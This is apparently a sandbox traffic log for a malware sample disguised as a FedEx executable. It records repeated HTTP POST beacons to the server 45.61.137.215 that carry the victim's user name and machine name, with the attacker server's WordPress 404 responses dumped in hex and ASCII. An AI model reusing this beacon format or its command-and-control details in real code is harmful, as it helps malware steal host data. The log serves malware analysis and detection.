2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:02:36.778620958 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:02:36.779669046 CEST	448	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:02:36.779683113 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 22, 2024 22:02:36.782131910 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
May 22, 2024 22:02:36.782149076 CEST	448	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 22, 2024 22:02:36.782160044 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:02:36.782166958 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 22, 2024 22:02:36.784636021 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
May 22, 2024 22:02:36.784651995 CEST	224	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49729	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:02:36.928241968 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:02:36.980532885 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:02:39.583112001 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:02:37 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:02:39.583364964 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:02:39.584352970 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:02:39.584367037 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:02:39.586272001 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:02:39.587269068 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:02:39.587281942 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 22, 2024 22:02:39.587291956 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 22, 2024 22:02:39.589179993 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 22, 2024 22:02:39.590147972 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49730	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:02:39.745781898 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:02:39.799977064 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:02:42.889563084 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:02:40 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:02:42.889704943 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:02:42.890584946 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:02:42.890621901 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:02:42.892327070 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:02:42.892364979 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:02:42.894057989 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 22, 2024 22:02:42.894938946 CEST	1236	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 22, 2024 22:02:42.894973993 CEST	1236	IN	Data Raw: 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b Data Ascii: ar(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important
May 22, 2024 22:02:42.895783901 CEST	896	IN	Data Raw: 61 63 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 Data Ascii: ack-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49731	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:02:43.048990011 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:02:43.099996090 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:02:46.268683910 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:02:43 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 